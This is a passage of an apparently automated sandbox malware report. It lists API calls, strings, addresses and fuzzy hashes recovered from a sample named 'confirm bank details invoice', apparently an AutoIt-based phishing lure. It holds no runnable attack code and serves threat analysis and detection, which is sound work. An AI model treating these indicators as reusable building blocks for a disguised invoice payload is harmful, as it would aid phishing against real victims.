                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __snwprintf
                    • String ID: , $$AUTOITCALLVARIABLE%d
                    • API String ID: 2391506597-2584243854
                    • Opcode ID: 8d2ab7a73ad3d983e1426e6b5930bb72b27e07dae5878ec1a8b077da844be530
                    • Instruction ID: 7e7cced7577b310e0666fb89cc5453d65c744231409028b148100d50249e7fe7
                    • Opcode Fuzzy Hash: 8d2ab7a73ad3d983e1426e6b5930bb72b27e07dae5878ec1a8b077da844be530
                    • Instruction Fuzzy Hash: B5219135A00214ABCF10EFA5D881FED77B4BF45344F41805EF409AB181DA78EA45CBA9
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004D945C
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004D9467
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 95d6a46f17b65a7dc4830f4f234c363c987afd3d78c9bc02f9f3bae27cdf5e5d
                    • Instruction ID: e9447b01ea723bcb75d7669876113a8b86bdd1706a3f689aa54af1f3d0fba427
                    • Opcode Fuzzy Hash: 95d6a46f17b65a7dc4830f4f234c363c987afd3d78c9bc02f9f3bae27cdf5e5d
                    • Instruction Fuzzy Hash: 291190713002086FEF119E54DC90EBB376AEB583A4F10412BF918D73A1D6799C528BA8
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • GetActiveWindow.USER32 ref: 004DDA7B
                    • EnumChildWindows.USER32(?,004DD75F,00000000), ref: 004DDAF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ActiveChildEnumLongWindows
                    • String ID: T1L
                    • API String ID: 3814560230-767776119
                    • Opcode ID: 0bc5cf83836b1c365ecba7eb34b8839635ccb3c129de88b3a6f5544a5a9dd915
                    • Instruction ID: dd023729fe3266f991600f697eee9245d3481589125da9ddf1d865a76ed1b05f
                    • Opcode Fuzzy Hash: 0bc5cf83836b1c365ecba7eb34b8839635ccb3c129de88b3a6f5544a5a9dd915
                    • Instruction Fuzzy Hash: 2C213935604601DFC714DF78D861AA677E5FB59320F25061FE86A8B3E0DB34A805DB68
                    APIs
                      • Part of subcall function 0048D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0048D1BA
                      • Part of subcall function 0048D17C: GetStockObject.GDI32(00000011), ref: 0048D1CE
                      • Part of subcall function 0048D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0048D1D8
                    • GetWindowRect.USER32(00000000,?), ref: 004D9968
                    • GetSysColor.USER32(00000012), ref: 004D9982
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: 6b0959814d2d9ded3da7a60e045a0532dec68a7e01d78f858da4e82a1f721284
                    • Instruction ID: f7458040597cde25af4761ca4b6a0c31a0c511f41286efe3b7b5a06936d1d64d
                    • Opcode Fuzzy Hash: 6b0959814d2d9ded3da7a60e045a0532dec68a7e01d78f858da4e82a1f721284
                    • Instruction Fuzzy Hash: C31129B2510209AFDB04DFB8CC55AFA7BA8FF09344F01562EF955E2250D738E851DB54
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 004D9699
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004D96A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 4c9c849215858e307a9c66b9d48ee1e050409f0aaed7367c566b97b22c221001
                    • Instruction ID: 7c65577dc7b7d4404422d8dc899054e6177cc8531e99060e8df0782e6d0890d9
                    • Opcode Fuzzy Hash: 4c9c849215858e307a9c66b9d48ee1e050409f0aaed7367c566b97b22c221001
                    • Instruction Fuzzy Hash: 45116A71500108AAEF105FA4DC64AEB3B6AEB15378F104726F965D73E0C739DC51A768
                    APIs
                    • _memset.LIBCMT ref: 004B52D5
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004B52F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 9d61ecd403c24673c3ff1b1895cb2f71c5b1bbf91ff30df427d450314c989bcc
                    • Instruction ID: 46c84e44c654738cd7dbe04d782caec403932f77bd9b273ec41a020d9d5ec42e
                    • Opcode Fuzzy Hash: 9d61ecd403c24673c3ff1b1895cb2f71c5b1bbf91ff30df427d450314c989bcc
                    • Instruction Fuzzy Hash: 7E11D072901A14ABDB24DAB8D904BDEF7E8AB05750F080066ED01A7390D3B4ED06CBB9
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004C4DF5
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004C4E1E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 9cf5437c7b7e853a5ae7cb57638715ceca6f643c77b7580abf7ea62cdb9d2ce6
                    • Instruction ID: 755b7424b67f5b8e8db3130b834bd95fe1b6d871453318c6b2a71d77906506ff
                    • Opcode Fuzzy Hash: 9cf5437c7b7e853a5ae7cb57638715ceca6f643c77b7580abf7ea62cdb9d2ce6
                    • Instruction Fuzzy Hash: 2D11CE78500221BADB649F5188A8FFBFAA9FF46351F10822FF50686240D2786941C6F4
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004A37A7
                    • ___raise_securityfailure.LIBCMT ref: 004A388E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: (S
                    • API String ID: 3761405300-2396237897
                    • Opcode ID: cf377e35726f4bfd668eb1646971038f42a0143289ce372d8cab311a3d9f9ecf
                    • Instruction ID: e6efdec580cafded971f8e4912cd14e4937a72909787175a01cc072c0e2b166f
                    • Opcode Fuzzy Hash: cf377e35726f4bfd668eb1646971038f42a0143289ce372d8cab311a3d9f9ecf
                    • Instruction Fuzzy Hash: C52168B5200304CBE710DF55F9A56013BF8BB29310F10A86AE5048B7E0E3F4A988FF49
                    APIs
                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 004CA84E
                    • htons.WSOCK32(00000000,?,00000000), ref: 004CA88B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: htonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 3832099526-2422070025
                    • Opcode ID: f056e614d3b055f0e898019945990661956a58d0b92deaf364bb1d7c08aed18f
                    • Instruction ID: ac325fa9320c77c8878f63aa242d1729abbc200c32ef2d288ac7e16114bb986a
                    • Opcode Fuzzy Hash: f056e614d3b055f0e898019945990661956a58d0b92deaf364bb1d7c08aed18f
                    • Instruction Fuzzy Hash: 5D010479200308ABCB10EF68C886FA9B364EF05718F10842FF5169B3D1C739E821C76A
                    APIs
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004AB7EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: ComboBox$ListBox
                    • API String ID: 3850602802-1403004172
                    • Opcode ID: 82a459086beef39f9168cdc2017857ae3914477436a9560d3e22c18924a2b58b
                    • Instruction ID: a3e23b8a4a69dd48ad2a53d98b0170194daf5ac5cc8bab4ce363ea355915b0df
                    • Opcode Fuzzy Hash: 82a459086beef39f9168cdc2017857ae3914477436a9560d3e22c18924a2b58b
                    • Instruction Fuzzy Hash: 72012875A00114BBDB04EBA4DC429FE336AFF27314B00061EF462932C2EB78580887A8
                    APIs
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 004AB6EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: ComboBox$ListBox
                    • API String ID: 3850602802-1403004172
                    • Opcode ID: 6f9f19c6cce7e0e58500d47bfb4092ddd08af6f69ae40f905a58e73a990169b2
                    • Instruction ID: 776a3142131d4a9b98a7151e5a98bd7f50c88b238f92f7d7470c51c53eac2337
                    • Opcode Fuzzy Hash: 6f9f19c6cce7e0e58500d47bfb4092ddd08af6f69ae40f905a58e73a990169b2
                    • Instruction Fuzzy Hash: 0B018475A41004BBDB04EBA5D952BFF73A9DF27344F10401EB402A32C2EB585E1897EA
                    APIs
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 004AB76C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: ComboBox$ListBox
                    • API String ID: 3850602802-1403004172
                    • Opcode ID: 1085736dd6a27774c3ca5d086f27d8c2fde0ab637d1a285bc11b885d075ce628
                    • Instruction ID: 515ef73eac813bf18956b6d8a70f5ce33345b12d8a9302c44f6ae0530cf7b1e2
                    • Opcode Fuzzy Hash: 1085736dd6a27774c3ca5d086f27d8c2fde0ab637d1a285bc11b885d075ce628
                    • Instruction Fuzzy Hash: CD01A779A40104BBDB00E7A4D952AFF73AD9F27344F50401EB402B3192EB985E1987F9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: "S
                    • API String ID: 3494438863-2984366834
                    • Opcode ID: a2ecc2e9b70fca7badb49a7f77e19e0aaca8d1806390abc4b63a8ffa2a795b83
                    • Instruction ID: 5474d52bac0c1be23e6bf051b228122a8d8802566c9712ea45b633971ab27e26
                    • Opcode Fuzzy Hash: a2ecc2e9b70fca7badb49a7f77e19e0aaca8d1806390abc4b63a8ffa2a795b83
                    • Instruction Fuzzy Hash: C0F0C879209A115AEB149B59FC51E676FD4FB64764F10023FF204CA384E738C8435B99
                    APIs
                    • LoadImageW.USER32(00470000,00000063,00000001,00000010,00000010,00000000), ref: 00474048
                    • EnumResourceNamesW.KERNEL32(00000000,0000000E,004B67E9,00000063,00000000,75A90280,?,?,00473EE1,?,?,000000FF), ref: 004E41B3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: EnumImageLoadNamesResource
                    • String ID: >G
                    • API String ID: 1578290342-1296849874
                    • Opcode ID: 45e21f6cae4c71a041587b1aca3572d897446e6333d2251df7d4dbd039e68508
                    • Instruction ID: 0c568351fc0575fb710a0af91748b29c9b4658e72fdf68d49025b23229df8517
                    • Opcode Fuzzy Hash: 45e21f6cae4c71a041587b1aca3572d897446e6333d2251df7d4dbd039e68508
                    • Instruction Fuzzy Hash: 31F06D31640754B7E6204B2AAC4AFE23AA9E765BB5F104506F214AA2D0D3E49194EAEC
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: c0d83d273308a5156c52328c223eaec60b56710f23fbaf4948332dfe56aca2cb
                    • Instruction ID: 5076256de13d3eb05ff916d81671356dc5e791e5288d143172f44358bf3a5b66
                    • Opcode Fuzzy Hash: c0d83d273308a5156c52328c223eaec60b56710f23fbaf4948332dfe56aca2cb
                    • Instruction Fuzzy Hash: 83E09277A0422527DB10AAA6AC49ED7FFACAB91764F01006AB905D3181D668A605C7E4
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004AA63F
                      • Part of subcall function 004913F1: _doexit.LIBCMT ref: 004913FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: 56b81112fa89af1d80a95150fe3142abedc5722548910c250ce587eb20127e68
                    • Instruction ID: 9788727f4bf76b0a4e500f46e75eab2c6aa042f2a7904ae8268ca8f5034449e2
                    • Opcode Fuzzy Hash: 56b81112fa89af1d80a95150fe3142abedc5722548910c250ce587eb20127e68
                    • Instruction Fuzzy Hash: C8D05B313C432833E21436997C17FDD79489F15B55F04442BBF0C955D349DA969042ED
                    APIs
                    • GetSystemDirectoryW.KERNEL32(?), ref: 004EACC0
                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 004EAEBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: DirectoryFreeLibrarySystem
                    • String ID: WIN_XPe
                    • API String ID: 510247158-3257408948
                    • Opcode ID: e8dc4ca871ea50c98923e1f3f5f1cf2ffb92e1fd52a87ce4f1a5eb90e0364113
                    • Instruction ID: 71fe41909f48761e635a25e8e59bf1b8c1b738b0e53a10f663c3753543424ae9
                    • Opcode Fuzzy Hash: e8dc4ca871ea50c98923e1f3f5f1cf2ffb92e1fd52a87ce4f1a5eb90e0364113
                    • Instruction Fuzzy Hash: D2E0E570C00549DFCB11DBA6D9449EDB7B8AB58301F2480D7E112B2660D7746A95DF2A
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004D86E2
                    • PostMessageW.USER32(00000000), ref: 004D86E9
                      • Part of subcall function 004B7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7AD0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 36b1708e3a8956df1d47da92078f24e39bb343a60c3af80501d684ab1bf54d2c
                    • Instruction ID: 958b4f5651b1ce7ecfa1fdf42f6a4670c4448d1c94577d88f25bfe65e196154f
                    • Opcode Fuzzy Hash: 36b1708e3a8956df1d47da92078f24e39bb343a60c3af80501d684ab1bf54d2c
                    • Instruction Fuzzy Hash: 57D0C9317853247BF3656770AC0BFD67A59AB49B11F100829B649EA1D0C9A4A950C668
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004D86A2
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004D86B5
                      • Part of subcall function 004B7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7AD0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 1bd3c7405a98666d4afab5f0d38d87c8a01855229576a4ff055cae6a030da5c5
                    • Instruction ID: 464797ce15f72da5e30cf9846953eb1163eb08261301cbc93442695cf3757e96
                    • Opcode Fuzzy Hash: 1bd3c7405a98666d4afab5f0d38d87c8a01855229576a4ff055cae6a030da5c5
                    • Instruction Fuzzy Hash: 59D0C931784324B7E3646770AC0BFD67E59AB44B11F100829B649AA1D0C9A4A950C668